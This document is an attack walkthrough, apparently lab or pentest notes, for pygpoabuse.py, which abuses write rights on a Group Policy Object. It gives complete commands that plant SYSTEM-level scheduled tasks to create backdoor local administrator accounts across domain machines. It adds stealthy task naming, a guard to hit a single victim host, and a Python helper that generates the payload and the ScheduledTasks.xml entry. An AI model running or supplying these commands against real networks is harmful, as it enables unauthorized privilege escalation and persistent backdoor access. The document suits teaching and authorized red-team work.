# pygpoabuse.py
Very handy utility for abusing GPOs on which you hold excessive rights (for example `GenericWrite` on the GPO object). It drops an immediate scheduled task into the GPO's `ScheduledTasks.xml`; that task runs as SYSTEM on every computer the GPO applies to, at the next Group Policy refresh (or when someone runs `gpupdate /force`), so check the GPO's scope before you pull the trigger. Here's an example:

```
pygpoabuse.py north.sevenkingdoms.local/samwell.tarly:'Heartsbane' -gpo-id "THE ID YOU COPIED MINUS THE CURLY BRACES" -command "net user BACKDOORUSER Mypass123! /add && net localgroup administrators YOURSTUDENTLOGIN /add" -taskname "Whatever you wanna call the task" -v
```

In the command above:

* `THE ID YOU COPIED MINUS THE CURLY BRACES` - is exactly that: the GPO's GUID as BloodHound shows it (it is also the `{GUID}` folder name in the GPO's `gPCFileSysPath` under SYSVOL), with the curly braces stripped.
* `BACKDOORUSER` - the local account the task creates on every machine the GPO applies to. Note that the second half of the command adds `YOURSTUDENTLOGIN` (your own domain account) to the local Administrators group, not `BACKDOORUSER`; if you want the new local account to be an admin as well, name it there too.
* `Mypass123!` - the password assigned to the backdoor account. **IMPORTANT: KEEP IT TO 14 CHARACTERS OR FEWER.** `net user` asks for Y/N confirmation when a password is longer than 14 characters, and nothing can answer that prompt inside a scheduled task, so the command stalls and the task fails.
* `-taskname "Whatever you wanna call the task"` - is exactly that: the name of the immediate scheduled task written into the GPO. Pick something that blends in, and remember it, because you will reuse the same arguments for cleanup.
* `-v` - verbose output.

!!!tip Tip
When the command contains a UNC path, such as `-command "certutil -syncwithwu \\\\10.1.2.3"`, double every backslash: inside bash double quotes each `\\` pair collapses to a single `\`, so `\\\\10.1.2.3` reaches the tool as `\\10.1.2.3`. Single-quoting the whole `-command` argument is the other option, since bash leaves backslashes alone there.
!!!

!!!tip Tip #2
If you run the script without a `-command` flag, it inserts a scheduled task whose payload looks something like this in the resulting `ScheduledTasks.xml`:

```
net user administrator7 S3cr3bkd00r! /add &amp;&amp; net localgroup Administrators administrator7 /add
```

I'm not 100% on this, but I think you *need* to use `&amp;&amp;` and not literally `&&` in the .xml file or the task will fail.
!!!

!!!tip Tip #3
The GPO fires on every computer in its scope. If you want the payload to run on one specific machine only, guard it with cmd's `if`: `if` takes the rest of the line as its body, so the whole `&&` chain is skipped on every other host.

```
if /i "%COMPUTERNAME%"=="VICTIM-PC-LOL" net user administrator7 S3cr3bkd00r! /add &amp;&amp; net localgroup Administrators administrator7 /add
```
!!!
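The GUID normalisation and the 14-character password rule from the argument list, the `&amp;&amp;` escaping from Tip #2 and the `%COMPUTERNAME%` guard from Tip #3, pulled together in a small Python helper. This is an added example, not pygpoabuse's own code: the XML it writes is a simplified ImmediateTaskV2-style fragment that only mimics the shape of a GPP `ScheduledTasks.xml` entry, and the GUID (the well-known Default Domain Policy GUID), `administrator7`, `VICTIM-PC-LOL` and the task name `Updater` are sample values. It uses `xml.etree.ElementTree`, which escapes `&` to `&amp;` on output and unescapes it on parse; a bare `&&` in the file would not be well-formed XML and the Group Policy client would not parse it.

```python
import re
import xml.etree.ElementTree as ET

# GUID as BloodHound shows it, with or without the curly braces
GUID_RE = re.compile(r"^[0-9a-f]{8}(-[0-9a-f]{4}){3}-[0-9a-f]{12}$", re.IGNORECASE)


def normalize_gpo_id(raw: str) -> str:
    """Return the bare GPO GUID that -gpo-id expects: braces stripped, format checked."""
    gid = raw.strip().strip("{}")
    if not GUID_RE.match(gid):
        raise ValueError(f"not a GPO GUID: {raw!r}")
    return gid.upper()


def password_ok(password: str) -> bool:
    """net user prompts for Y/N confirmation on passwords longer than 14 characters,
    and nothing answers that prompt inside a scheduled task, so the command stalls.
    Spaces and quotes would also break the cmd.exe one-liner, so reject them too."""
    return 0 < len(password) <= 14 and not any(c in password for c in ' "')


def build_payload(user: str, password: str, only_on: str = "") -> str:
    """cmd.exe one-liner: create a local user and add it to Administrators.
    only_on: NetBIOS computer name the task should fire on; empty means every host in scope."""
    if not password_ok(password):
        raise ValueError("password must be 1-14 characters with no spaces or quotes")
    cmd = f"net user {user} {password} /add && net localgroup Administrators {user} /add"
    if only_on:
        # cmd's 'if' takes the rest of the line as its body, so the whole && chain is guarded
        cmd = f'if /i "%COMPUTERNAME%"=="{only_on}" {cmd}'
    return cmd


def render_task_xml(taskname: str, payload: str) -> str:
    """Serialise a simplified ImmediateTaskV2-style entry (assumption: this mimics the shape
    of a GPP ScheduledTasks.xml entry, it is not pygpoabuse's exact output). ElementTree
    escapes the '&' characters for us, which is what keeps the file well-formed XML."""
    root = ET.Element("ScheduledTasks")
    task = ET.SubElement(root, "ImmediateTaskV2", name=taskname)
    props = ET.SubElement(task, "Properties", action="C", name=taskname,
                          runAs="NT AUTHORITY\\System", logonType="S4U")
    actions = ET.SubElement(ET.SubElement(props, "Task", version="1.3"), "Actions", Context="Author")
    exec_ = ET.SubElement(actions, "Exec")
    ET.SubElement(exec_, "Command").text = "cmd.exe"
    ET.SubElement(exec_, "Arguments").text = f'/c "{payload}"'
    return ET.tostring(root, encoding="unicode")


def arguments_from_xml(xml_text: str) -> str:
    """Parse the fragment back; the parser turns &amp;&amp; into && again."""
    return ET.fromstring(xml_text).find(".//Arguments").text


if __name__ == "__main__":
    # sample values: the well-known Default Domain Policy GUID, made-up user/host/task names
    gid = normalize_gpo_id("{31B2F340-016D-11D2-945F-00C04FB984F9}")
    payload = build_payload("administrator7", "S3cr3bkd00r!", only_on="VICTIM-PC-LOL")
    xml_text = render_task_xml("Updater", payload)
    print("-gpo-id", gid)
    print("-command", payload)
    print(xml_text)                      # note the &amp;&amp; inside <Arguments>
    print(arguments_from_xml(xml_text))  # and the plain && once parsed back
```

Feed `build_payload()`'s output to `-command` as-is: the tool does the XML escaping when it writes the file, so the literal `&&` on the command line is correct, and `&amp;&amp;` is what you expect to see on disk afterwards.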

!!!tip Tip #4
To remove the task from `ScheduledTasks.xml`, run the same command you used to create it, with `--cleanup` added:

```
pygpoabuse.py north.sevenkingdoms.local/samwell.tarly:'Heartsbane' -gpo-id "THE ID YOU COPIED MINUS THE CURLY BRACES" -command "net user BACKDOORUSER Mypass123! /add && net localgroup administrators YOURSTUDENTLOGIN /add" -taskname "Whatever you wanna call the task" --cleanup -v
```
* `--cleanup` - removes the scheduled task entry from the GPO's `ScheduledTasks.xml`. It does not undo what the task already did on the targets: any backdoor account it created stays until you remove it yourself.
!!!
